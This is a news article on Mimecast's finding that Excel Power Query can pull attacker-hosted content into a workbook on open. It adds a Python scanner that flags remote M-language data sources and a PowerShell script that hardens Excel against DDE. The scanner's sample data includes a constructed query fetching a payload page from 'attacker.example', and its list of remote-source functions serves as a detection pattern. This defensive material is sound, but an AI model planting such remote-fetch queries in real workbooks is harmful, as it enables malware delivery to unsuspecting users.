Security researchers have devised a method to abuse a legitimate Microsoft Excel technology named Power Query to run malicious code on users’ systems with minimal interaction.
Power Query is a data connection technology that can allow Excel files to discover, connect, combine, and manipulate data before importing it from remote sources, such as an external database, text document, another spreadsheet, or a web page.
The tool is included with recent versions of Excel and available as a separate downloadable add-in for older Excel versions.
In research published today and shared with ZDNet, Ofir Shlomo, a security researcher with the Mimecast Threat Center, described a technique through which Power Query features could be abused to run malicious code on users’ systems.
The technique relies on specially crafted, otherwise well-formed Excel documents in which a Power Query connection pulls data from an attacker-controlled remote server when the file is opened.
“Using Power Query, attackers could embed malicious content in a separate data source, and then load the content into the spreadsheet when it is opened,” Shlomo said. “The malicious code could be used to drop and execute malware that can compromise the user’s machine.”
Because the malicious content is fetched from the attacker’s server only when the document is opened, rather than being stored in the file, Mimecast says the technique can also evade the security sandboxes that analyze email attachments before users are allowed to download and open them.
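That sandbox-evasion property is worth dwelling on: a detonation sandbox only sees what the attacker’s server chooses to serve it, but the query itself still has to be stored in the workbook. The following triage script, an added example that is not Mimecast’s or Microsoft’s code, statically extracts the Power Query (“DataMashup”) part from an .xlsx, decodes it, and flags any M-language formula that reaches a remote data source. It assumes the DataMashup layout documented in MS-QDEFF (a 4-byte version, a 4-byte length, then a zip of package parts containing the `Formulas/*.m` files); the sample workbooks, the `attacker.example` URL and the list of “remote” M functions are constructed for illustration.

```python
"""Static triage of Power Query (DataMashup) parts inside an .xlsx."""
import base64
import io
import re
import struct
import zipfile

# M-language functions that reach outside the workbook for their data.
# Illustrative list, not exhaustive; extend it for your environment.
REMOTE_SOURCE_FUNCS = (
    "Web.Contents", "Web.Page", "Web.BrowserContents",
    "Sql.Database", "OData.Feed", "File.Contents", "Folder.Files",
)
URL_RE = re.compile(r"(?:https?://[^\s\"')]+|\\\\[^\s\"')]+)")
MASHUP_RE = re.compile(r"<(?:\w+:)?DataMashup[^>]*>([^<]*)</")


def unpack_datamashup(blob: bytes) -> bytes:
    """Return the Package Parts zip from a base64-decoded DataMashup blob.

    Layout (assumed from MS-QDEFF): Version (4 bytes LE), PackagePartsLength
    (4 bytes LE), PackageParts (a zip), then permissions/metadata sections
    that this scanner does not need.
    """
    if len(blob) < 8:
        raise ValueError("DataMashup blob too short")
    _version, parts_len = struct.unpack_from("<II", blob, 0)
    parts = blob[8:8 + parts_len]
    if not parts.startswith(b"PK"):
        raise ValueError("Package Parts section is not a zip")
    return parts


def extract_queries(xlsx_bytes: bytes) -> dict:
    """Map customXml part name -> {formula file -> M source} for each DataMashup."""
    queries = {}
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as outer:
        for name in outer.namelist():
            if not (name.startswith("customXml/") and name.endswith(".xml")):
                continue
            match = MASHUP_RE.search(outer.read(name).decode("utf-8", "replace"))
            if not match:
                continue
            parts = unpack_datamashup(base64.b64decode(match.group(1).strip()))
            with zipfile.ZipFile(io.BytesIO(parts)) as inner:
                queries[name] = {
                    f: inner.read(f).decode("utf-8", "replace")
                    for f in inner.namelist() if f.endswith(".m")
                }
    return queries


def scan_workbook(xlsx_bytes: bytes) -> list:
    """Return one finding per M formula file that names a remote source or a URL."""
    findings = []
    for part, formulas in extract_queries(xlsx_bytes).items():
        for fname, src in formulas.items():
            funcs = [fn for fn in REMOTE_SOURCE_FUNCS if fn + "(" in src]
            urls = URL_RE.findall(src)
            if funcs or urls:
                findings.append({"part": part, "formula": fname,
                                 "functions": funcs, "urls": urls})
    return findings


def build_sample_xlsx(m_source: str) -> bytes:
    """Constructed minimal workbook carrying one Power Query (not a real Excel export)."""
    inner_buf = io.BytesIO()
    with zipfile.ZipFile(inner_buf, "w", zipfile.ZIP_DEFLATED) as inner:
        inner.writestr("Formulas/Section1.m", m_source)
    inner_zip = inner_buf.getvalue()
    blob = (struct.pack("<II", 0, len(inner_zip)) + inner_zip
            + struct.pack("<I", 0) * 3)  # empty permissions/metadata/bindings
    item = ('<DataMashup xmlns="http://schemas.microsoft.com/DataMashup">'
            + base64.b64encode(blob).decode() + "</DataMashup>")
    outer_buf = io.BytesIO()
    with zipfile.ZipFile(outer_buf, "w", zipfile.ZIP_DEFLATED) as outer:
        outer.writestr("[Content_Types].xml", "<Types/>")
        outer.writestr("xl/workbook.xml", "<workbook/>")
        outer.writestr("customXml/item1.xml", item)
    return outer_buf.getvalue()


# Constructed queries: one pulling a page from an attacker host, one purely local.
MALICIOUS_QUERY = """section Section1;
shared Payload = let
    Source = Web.Contents("http://attacker.example/payload.html")
in Source;
"""
BENIGN_QUERY = """section Section1;
shared Table1 = Table.FromRows({{1, "a"}, {2, "b"}});
"""

if __name__ == "__main__":
    for label, query in (("malicious", MALICIOUS_QUERY), ("benign", BENIGN_QUERY)):
        print(label, scan_workbook(build_sample_xlsx(query)))
```

The scanner never executes the query, so the attacker’s server is never contacted and cannot tell a scanner apart from a victim; a workbook whose only job is to fetch an HTML page from an unfamiliar host is worth a closer look regardless of what that host serves today.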
Disabling DDE stops attacks
The Power Query technique closely resembles a malware distribution method SensePost detailed in 2017, which abused another Excel data-import feature, Dynamic Data Exchange (DDE).
Mimecast said it reported the attack vector to Microsoft, but, as with DDE, Microsoft declined to issue a patch: the behavior is not a flaw in the feature’s design but a legitimate feature being abused by bad actors.
Microsoft added that disabling DDE support in Excel should also protect users against attacks abusing Power Query, because the technique ultimately relies on DDE to execute the content that Power Query imports.
In December 2017, Microsoft disabled DDE by default in Word but left it enabled in Excel, where the feature is far more likely to be used for legitimate purposes.
Instructions on how to disable DDE in Excel are available in Microsoft’s KB4053440 advisory.
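The following PowerShell, an added example rather than text from the advisory, applies and then verifies the per-user Excel registry values involved. The `WorkbookLinkWarnings = 2` setting is the one KB4053440 documents for Excel; the two `DisableDDEServer*` values are assumed to be the registry backing of the “Dynamic Data Exchange Server Launch/Lookup” checkboxes Microsoft later added under Trust Center > External Content, and `DataConnectionWarnings` is assumed to back the “Don’t allow data connections” policy, so confirm those three names against your Office build before rolling them out.

```powershell
# Added example: apply and verify DDE hardening for Excel under the current user.
# Office 2016/2019/365 use version key 16.0; Office 2013 is 15.0, Office 2010 is 14.0.
$officeVersion = "16.0"
$key = "HKCU:\Software\Microsoft\Office\$officeVersion\Excel\Security"

$settings = [ordered]@{
    # From KB4053440: 2 = disable automatic update of workbook links.
    "WorkbookLinkWarnings"   = 2
    # Assumed names for the Trust Center "DDE Server Launch/Lookup" checkboxes:
    # 1 = disabled. Verify against your build.
    "DisableDDEServerLaunch" = 1
    "DisableDDEServerLookup" = 1
}

# Stricter, optional: refuse every external data connection (assumed name for the
# "Don't allow data connections" policy; 2 = disable). This also blocks legitimate
# Power Query refreshes, so enable it only where no workbook needs them.
# $settings["DataConnectionWarnings"] = 2

if (-not (Test-Path $key)) {
    New-Item -Path $key -Force | Out-Null
}

foreach ($name in $settings.Keys) {
    Set-ItemProperty -Path $key -Name $name -Value $settings[$name] -Type DWord
}

# Read the values back so the change can be audited rather than assumed.
$current = Get-ItemProperty -Path $key
$allOk = $true
foreach ($name in $settings.Keys) {
    $actual = $current.$name
    $state = if ($actual -eq $settings[$name]) { "OK" } else { $allOk = $false; "MISMATCH" }
    "{0,-24} {1,-6} {2}" -f $name, $actual, $state
}
if (-not $allOk) { exit 1 }
```

Because these values live under HKCU, they must be set in each user’s hive (a logon script or Group Policy Preference is the usual vehicle); a domain-wide Group Policy for Office is the more durable way to enforce the same settings.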
Article updated at 4am ET with link to Mimecast’s research.